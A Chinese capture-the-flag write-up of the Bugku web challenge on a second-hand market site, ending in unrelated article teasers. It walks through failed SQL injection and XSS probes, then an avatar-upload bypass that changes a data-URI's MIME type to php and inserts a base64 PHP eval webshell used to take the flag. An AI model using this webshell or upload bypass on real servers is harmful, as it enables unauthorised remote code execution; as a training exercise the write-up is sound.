bugku-web-xxx二手交易市场

这里直接来到一个交易平台
还是三板斧
源码查看

<script>


$('#searchList li').click(function(){

var type=$(this).attr('aman-type');



$(this).parent().find('li').attr('class','red');

$(this).attr('class','red-on')



search();

});

function search(){

var url='/index';

var type=$("#type .red-on").attr('aman-value');

if(type!=''){

url+='/type/'+type;

}

location.href=url;

}

</script>

在源码中找到一个显露出来的script代码

响应报文查看

这里发现phpsessid,这点要注意

这里就是一个完整的网站架构,现在我们猜测flag的位置

这里有这几个跳转页面,一般来说首页没啥好测的
我们分别点开

二手

求购

公告

登录

注册

按照思路,先进行数据库渗透
公告页面首当其冲
我们查看后,发现规律
这里的页面并不是传参访问

而是直接跳转访问,所以不存在get的sql注入
先尝试下任意文件访问漏洞是否存在

这里出现个没有显示出来的页面
再然后就没有更多了

接下来就是商品页面
发现求购页面是假的,只有二手页面可以点开

发现这里访问页面传参,可以进行sql注入测试

在商品下发现评论,可以进行xss漏洞测试

先进行xss漏洞测试

要登录,先登录
随意注册了个账号,并登录

评论了两下,发现<>被注释

这种就是代表对方xss反渗透做的很好,没必要继续xss测试

接下来进行sql注入测试

这里看到闭合错误,说明这里有sql注入点

好家伙,居然对注释字符进行了过滤,无法闭合,sql注入点不存在

这下面有三个接口

因为求购页面是假的,所以先尝试发布二货

因为这里发布的填写数据,是可以被我们直接访问到的,如果我们在这些信息中包含一句话木马,是否可以利用菜刀或蚁剑连接呢

这里的二货和求购都在审核,相当离谱

相片和昵称都尝试上传一句话木马

这里可以看到,如果头像的一句话木马上传成功,则可以直接访问连接,成功getshell

上传正常图像抓包

但一旦上传非正常图像上去,就会出现加载不出来的情况
因为没有报文发送,应该是卡在前端这个图像编辑器这里
这里在选中非正常图片的报文是这样的

正常图片的报文是这样的

这里会多出一个data报文

这里我们抓取上传报文,将这里的image数据给改了,改为一句话木马

显示上传失败
有可能是没有加密

把数据夹杂进去
提示保存成功

但是这里是jpeg文件,蚁剑只能连接php文件
所以要改后缀

多次提交后发现,不论提交的是什么后缀最后都会改为jpeg后缀
从上面探查到的报文和bp抓下来的报文进行分析

这里看到data这个关键字,即下面的是上面报文加密的状态

下面解密后得到

data:image/jpeg;base64,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

分别上传两张图片进行比较

data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb%2F2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD%2F2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD%2FwAARCAUABQADASIAAhEBAxEB%2F8QAHgAAAQQDAQEBAAAAAAAAAAAAAAECAwQFBwgGCQr%2FxABzEAABAwMCAwQEBg0ECQ0NAREBAAIDBAURBiEHEjEIE0FRFCJhcRUWVYGRoRcYMkJSU1RikpOUsdEJI1aVJDM1V3OywdLhJTZDZGVydHWCs7TT8BkmNDdERUZYY4SWotQnKEdmdoPxOKXDZ3fC4lmFpLX%2FxAAcAQEAAwEBAQEBAAAAAAAAAAAAAQIDBAUGBwj%2FxAA4EQACAgEDAgQFAgQFBAMAAAAAAQIRAwQSIQUxExRBUQYVIjJhM1IHcZGhFiNCU4EkVLHBF9Hw%2F9oADAMBAAIRAxEAPwDAcFtG8ONU6Frw%2BiluF1uXNBqF9zHNWCo%2B%2Ba8ndoB3GF4jVmpeIPBumbwndV1DqW51cMNjvQHNLFSPeGvj5j0kYDsd%2FwDKsBY5eJ%2BkaebtC0139MozUdzfbfHCG9%2FT5A7zbq5ueuMrYPHjXmjLzwsobybm6urbnyVVhgpA104nBBbIM55QD91nbbCA9Aez3dQ0uPHLiPsM%2FwB2HKCl4C3WpLscbuJDQ04yby7deNjpeONRoG16qqeOlXT1Nza3%2BwzZIHd2S7BHPzb49wV7gbX8VL%2FqivqLnxEr7xpy0%2FzDpvQIoW1NVj1mt5QSWt887%2BxAes%2B15u39%2FLiP%2FXDkfa83b%2B%2FlxH%2FrhyqcduIOptOVFo0lpXVPwXXXKOStnrnQMeYaePYhrXbFxJAxsVqV2reLj6cT0%2FHrUstQ5%2FKKdujm8mM%2FjM4QG4NDU2odE8VZeHVTrC76ht9TbfTxLd5u%2FnikBxhr%2Bob7Fm%2B0PBy8HNSHHSmH%2BMFpjW9t1vpXQlx4k3PiRW1OopqH0eKq9FZTzQwl2DGImknfxd4exe50n2aOEN6sNHc7jZK%2BpqaqjiqJZX11Q0vkc0FxI5vEkoD1mroP%2FsDq3Y%2F8wRnp%2FwCzavB3Sx0usJOGWhb66eWyXC1unqaWOZ0Qlexo5SSwgnHvW63aWo7rpmXTlc177UYPRHQBzgXRAYA5geboBvnK8Jp3s%2FaF0VfrfqbSlBU0FYyoELXOqpZQWOB5hhziPBAY5
data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb%2F2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD%2F2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD%2FwAARCAJMAkwDASIAAhEBAxEB%2F8QAHQAAAQQDAQEAAAAAAAAAAAAABAIDBQYAAQcICf%2FEAEQQAAEDAwMDAwMDAgUCAwcDBQEAAgMEESEFEjEGQVEHEyIyYXEUgZEIIxUzQlKhYrEWJHIlJkOCksHRCVPhFzSTorL%2FxAAbAQADAQEBAQEAAAAAAAAAAAAAAgMBBAUGB%2F%2FEACYRAAICAgICAgMAAwEAAAAAAAABAhEDMRIhBBMFQSIyURQjYTP%2F2gAMAwEAAhEDEQA%2FAPma27BtLSSURAxkmJS5tuPCLpWt%2BHuRg4RjqelkbizV6oyGqWnhth6JIjp2kse0m3F0M6OOPDHE%2FhbgaXPsHtz%2FALig0fZWdi4JxsrXEHcL%2FlBSxubJtD2Z%2B6UyKTvKz%2BUAFve6Y7ZbNA4LU25jWA%2FMkWScswXg%2FgrdwRyEDxG2thlw0ncmnM9qUNZgkgEoiljbSyOkkIIdwtTQipcSHWB7oYxJiCWGlbNBUM3cgbggX1moPeY6mK7TgkDshnsfE1rWVDjtyM4WCerPxJBvi4UboBFVpzJAXxseL%2FZC%2FwCEVTCHQyua4nF%2FKOfFXOb8Zm%2Fi6dbK%2BGO09zjlR5WwMh0bXpIQ79XAQObkJQ0utYR%2BpdGR3LSte%2FE9mJ5AfASZP1MjbRSusebq0egEz0cAOXtH7pj2YGmzZB%2FKIjgAFptzifKdFNTXH9m33utAHhhAcD7gwR3Tz3PacOuPslGekpzmNx%2FZb%2FxSh%2F8A2H%2Fwm5AIEjgb7nG3ladVMF%2Fcx%2BEv%2FFaAfVA%2B34SH6ro7j84Hj8hScjE7NsqoCLANuUsAPF9rU0KrSn5jieP2T7JqY5abJORrFMDQLtbkcJ9lTMwi1khssRaQCL28pFwFqk26YsN0GtqJHkXATrAJHAXF7oKN5JAva6VG6RkpIN%2FwnSsdkiYyz%2FVhE0soa9jb43BBse97B8Xfwi6aEmzi04%2ByxujCchc22Krb%2BcI%2BkZG8k%2B7uP2N1FRxMfHlrwbeFL6a2CmjD3Ak8pHKhODJXTYhLUhkzi5jscronSL4tJq4p6V0wYGnc33L2PmyomkajRiWzor5Vy03VaSn2ObE43I7KayNCuDPQPS3UFPq9M2Nsp3M

将jpeg改为php

尝试了半天一定要把原来的图片数据删掉,这样插入的base64一句话木马才有效果

保留有用部分

插入一句话木马

image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

成功修改后缀和内容

上传成功

getshell

在当前网站目录下可以看到大量的文件,有一个文件的名称名为flag,打开查看

在这里看到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/548150.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

java通过maven导入本地jar包的三种方式

一、引入lib下加载&#xff08;加载过后打包&#xff0c;以后再次使用不用再次导入&#xff09; 首先创建一个用于创建jar包的项目&#xff0c;并测试能否成功运行 讲项目打包 在需要引入的项目中创建lib目录 并把刚才打包的jar复制进去 通过dependency引入jar包 groupId、art…

【安装部署】Apache SeaTunnel 和 Web快速安装详解

版本说明 由于作者目前接触当前最新版本为2.3.4 但是官方提供的web版本未1.0.0&#xff0c;不兼容2.3.4&#xff0c;因此这里仍然使用2.3.3版本。 可以自定义兼容处理&#xff0c;官方提供了文档&#xff1a;https://mp.weixin.qq.com/s/Al1VmBoOKu2P02sBOTB6DQ 因为大部分用…

详解数据中台,附案例

&#xff08;一&#xff09;什么是数据中台&#xff0c;有什么价值&#xff1f; 数据中台居于前台和后台之间&#xff0c;是企业级的数据共享、能力复用平台&#xff0c;是数字 化转型的基础和中枢系统。将企业全域海量、多源、异构的数据整合资产化&#xff0c;为业务前台提供…

使用TVM在树莓派部署yolov8模型(二)

这部分主要记录部署环境的搭建。 在电脑或服务器上编译&#xff0c;需要搭建完整的TVM工具链&#xff1b;树莓派上仅负责运行&#xff0c;因此只编译runtime即可。 先从简单的开始 一 在树莓派上编译runtime 我的树莓派是新装的系统&#xff0c;那就从头搭建环境吧。 我用的树…

发布!DolphinDB 白皮书正式上线官网!

对广大数据库用户而言&#xff0c;白皮书是极具参考价值的使用指南和学习手册。白皮书不但能深入剖析数据库的基础概念与架构&#xff0c;协助用户了解数据库的工作原理和应用技巧&#xff0c;更提供了丰富的实践案例&#xff0c;帮助用户从中汲取经验&#xff0c;避免在实际应…

在微信上怎么实现预约功能

在快节奏的现代生活中&#xff0c;时间成为了我们最宝贵的财富。无论是看病、理发、还是参加各类培训&#xff0c;等待往往成为了一个难以避免的“拦路虎”。为了解决这一痛点&#xff0c;微信预约功能应运而生&#xff0c;它不仅为我们的生活带来了极大的便利&#xff0c;更成…

文章解读与程序——资源回顾

综合能源是指利用多种能源形式&#xff0c;如化石能源、可再生能源和核能等&#xff0c;通过综合、灵活的方式满足能源需求。这种综合利用能源的方式旨在提高能源利用效率&#xff0c;减少能源消耗对环境的影响&#xff0c;并促进能源系统的可持续发展。 电力系统规划是指对电…

Android,AMS、WMS、PKMS添加动态控制debug开关功能

问题背景 在framework源码中有很多debug开关,通常我们想要看某个模块的日志,比如说广播,就需要去修改源码,把对应的debug值改为true,但是这种方法耗时耗力,比如说我想看sendBroadcast的流程,但是BroadcastQueue中有很多debug开关,如下: 这种就需要去修改对应的源码才…

PFA移液枪头为什么比普通塑料枪头贵这么多?

移液枪头是用于移液器的一次性适配枪头&#xff0c;可在各种研究应用中准确、精确、一致地转移少量液体。 PFA移液枪头&#xff0c;金属元素空白值低&#xff08;铅、铀含量小于0.01ppb)&#xff0c;化学性能好&#xff0c;可重复使用。 目前市场上的规格&#xff1a;0.01ml、…

C语言-字符函数与字符串函数

在C语言中&#xff0c;我们经常要对字符或是字符串进行各种操作。那C语言究竟给了我们哪些方法呢&#xff0c;本篇文章就是让大家了解对字符和字符串处理相关的知识。 目录 1.字符函数 1.1字符分类函数 1.2字符转换函数 2.字符串函数 2.1strlen函数的使用和模拟实现 2.2…

腾讯云幻兽帕鲁一键开服教程

腾讯云作为领先的云计算服务提供商&#xff0c;为广大用户提供了便捷、高效的游戏服务器搭建解决方案。其中&#xff0c;幻兽帕鲁一键开服功能&#xff0c;更是让游戏开服变得简单易懂。本文将为大家详细介绍腾讯云幻兽帕鲁一键开服的步骤&#xff0c;帮助大家轻松搭建自己的游…

cesium 指定点旋转rectangle Primitive方式 矩阵篇

cesium中rectangle是水平垂直于正北方向的&#xff0c;rectangle的属性中有rotation&#xff0c;但是rotation是以矩形的中心点进行旋转的&#xff0c;旋转过程中矩形的形状可能会变形&#xff0c;如果需要以矩形的顶点为原点进行旋转&#xff0c;可以采用primitive的方式添加p…

详解playwright 官方Javascript demo(适合小白)

如果大家刚上手playwright&#xff0c;并看到了Javascript脚本的官方demo&#xff0c;代码如下&#xff1a; const { webkit } require(playwright);(async () > {const browser await webkit.launch();const page await browser.newPage();await page.goto(http://what…

uni-starter的微信登录拿不到登录者的昵称,头像,手机号问题记录

uni-starter的微信登录竟然拿不到登录者的昵称&#xff0c;头像&#xff0c;手机号 获取手机号的方法在另外一篇文章中&#xff0c;需要认证&#xff0c;需要有营业执照 uni.login({"provider": type,"onlyAuthorize": true,// #ifdef APP"univerif…

嵌入式工程师如何利用周末提升自己?

提升自己一定要趁早&#xff0c;这是作为中年人的我&#xff0c;对年轻人的忠告。 以前年轻&#xff0c;觉得时间多&#xff0c;总是幻想着&#xff0c;很多人也大器晚成啊&#xff0c;晚点努力也不晚。 前阵子小米汽车火了&#xff0c;雷总说这是他最后一次重大创业&#xff0…

GEE APP——土壤水分资源管理器

摘要 由于土壤水分含量与地球气候和天气以及干旱、洪水或山体滑坡等现象有关,因此对许多科学和专业用户来说都非常宝贵。遥感技术为连续测量这一变量提供了独特的可能性。特别是在农业领域,对高空间分辨率绘图的需求非常强烈。然而,目前可操作的土壤水分产品只有中粗空间分…

RS232、RS485、RS422、TTL、CAN各自的区别

目录 一&#xff1a;工业串口通信标准RS232、RS485、RS422的区别 第一个区别、硬件管脚接口定义不同 第二个区别、工作方式不同 第三个区别、通信方式不同 第四个区别&#xff0c;逻辑特性不同 第五个区别、抗干扰性、传输距离和传输速率也不同 二&#xff1a;RS232、RS…

判断字符串为空的几种方法

1,关于null和""的区别&#xff1a; &#xff08;1&#xff09; null表示不指向任何东西&#xff0c;调用的话会报空指针异常&#xff1b; 空字符串""表示一个长度为0的字符串&#xff0c;调用是安全的&#xff1b; &#xff08;2&#xff09; null 不是对象…

LLM推理中的参数:beam_search、num_sequences、do_sample、temperature、top_k、top_p

原文&#xff1a; https://huggingface.co/blog/how-to-generate beam_search&#xff1a;动态规划每个step保留几个top解&#xff1b; num_sequences: generate输出几个top序列。num_sequences<beam_search。 do_sample: 设为True&#xff0c;则每个输出都进行采样&#…

【项目实战】记录一次PG数据库迁移至GaussDB测试(下)

上一篇分享了安装、迁移&#xff0c;本篇将继续分享迁移前操作、 DRS迁移数据、迁移后一致性检查、问题总结及解决方法。 目录 四、迁移前操作 4.1 源端(PG) 4.2 目标端(GaussDB库) 五、DRS迁移数据 5.1 创建复制用户 5.2创建迁移任务。 六、迁移后一致性检查 6.1使用…